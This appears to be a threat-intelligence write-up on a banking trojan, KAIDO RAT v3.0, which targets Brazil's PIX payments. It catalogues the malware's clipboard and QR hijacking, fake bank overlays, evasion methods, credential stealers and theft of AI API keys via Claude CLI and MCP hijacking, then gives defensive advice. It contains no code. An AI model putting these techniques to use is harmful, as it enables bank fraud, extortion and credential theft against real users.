How KAIDO RAT v3.0 Redefines Bank Malware with Modular PIX Hijacking and AI Credential Harvesting

Technical Architecture

KAIDO RAT v3.0 is built on .NET 9 and uses a plugin‑based architecture. Its core components include a headless C2 server, the "Lain" management panel (dashboard, client list, remote shell, file manager), HVNC with GPU capture, remote desktop + camera streaming, and an integrated generator/encryptor called KaidoKrypter that claims full undetectability (FUD).

Delivery methods rely on LNK drops, ClickFix social‑engineering, and HTML smuggling.

Plugin Scale

The suite ships more than 60 functional plugins organized into modules such as evasion (10), Brazil‑specific banking suite (8), data stealers (18), reconnaissance (7), persistence/post‑exploitation (9), and AI credential harvesting (5).

Brazil‑Specific Banking Suite

This is the most dangerous part, targeting the PIX instant‑payment system.

PIX Hijacking Family

PIX Clipper : monitors clipboard, recognizes CPF, CNPJ, email, EVP formats, and replaces copied data with attacker‑controlled accounts.

EMV QR Code Poisoner : rewrites QR code payloads in real time, recalculates CRC‑16 checksums, and remains invisible to victims.

PIX Ghost : uses Windows UI automation to hijack transactions without relying on the clipboard, making detection harder.

Bank Overlay

Real‑time detection of 28 major Brazilian banks.

Full‑screen fake login windows for 19 bank themes.

Selective keylogging only when a bank window is active.

Device Lock

Locks keyboard, mouse, and Task Manager, forcing the user to pay a ransom.

Advanced Evasion Techniques (10 Modules)

ETW patching of five functions plus AMSI bypass via VEH for double‑layer protection.

Direct system calls (Hell's Gate) and indirect calls to bypass user‑mode hooks.

Sleep‑confusion using XOR encryption and PAGE_NOACCESS to defeat static and dynamic analysis.

Stack deception to evade stack‑based EDR detection.

Additional tricks: thread‑pool execution, six callback methods, PPID spoofing, API hashing, and 19 anti‑VM checks.

Data Stealer Functions (18 Modules)

Comprehensive credential theft covering browsers, passwords, tokens (Discord, Telegram, Steam, Spotify), session data (including WAL lock bypass), NTLM hashes, LSASS memory dumps, SSH/RDP/cloud platform credentials, 13 browser‑extension crypto wallets, MetaMask, ICP‑Brasil A1 certificates with private keys, and Open Banking access for 12 banks.

AI Credential Harvesting Module (New Focus)

Targets AI developers to steal API keys from platforms such as Anthropic (Claude), OpenAI (ChatGPT API), Google Gemini, xAI, and Groq.

Injection Methods

Claude CLI C2 via Discord/Telegram channels.

Claude Desktop MCP hijacking.

Git hook injection.

Jupyter IPython startup hooks.

Attack Intent

Model abuse for generating malicious content.

Compute theft, as large‑model inference is costly.

Supply‑chain attacks to poison AI training data or outputs.

Reconnaissance Modules (7)

Network mapper.

VPN detector.

Document radar for scanning sensitive files.

Form ghost (CDP hijacking).

Database dump (SQL Server + SQLite).

Certificate store enumeration.

Cryptocurrency memory siphon.

Post‑Exploitation Modules (9)

EDR Killer v2.0 (no PowerShell/cmd dependency).

UAC bypass (three methods).

LPE exploit using miniPlasma and CVE‑2026‑40369.

Kerberoasting and AS‑REP roasting.

COM hijack persistence.

Process hollowing.

Infrastructure

.NET 9 headless server (C2 controller).

.NET 4.8 client.

Single DLL plugin (~7 MB).

AES‑256‑CBC encryption with native stub and ML evasion.

Six layers of obfuscation.

TLS‑based C2 using MessagePack with jitter.

Discord token and Pastebin fallback channel.

nginx + socat redirector.

Defense Recommendations

Endpoint Protection

Prioritize behavior‑based detection over signature‑based.

Review EDR policies to monitor abnormal process termination.

Watch for UI‑automation‑related anomalies.

PIX Security

Enable multi‑factor authentication for high‑value transfers.

Verify recipient information before confirming PIX payments.

Be wary of any request claiming the bank needs remote assistance.

Social‑Engineering Defense

Guard against ClickFix and HTML smuggling attacks.

Strengthen employee security awareness training.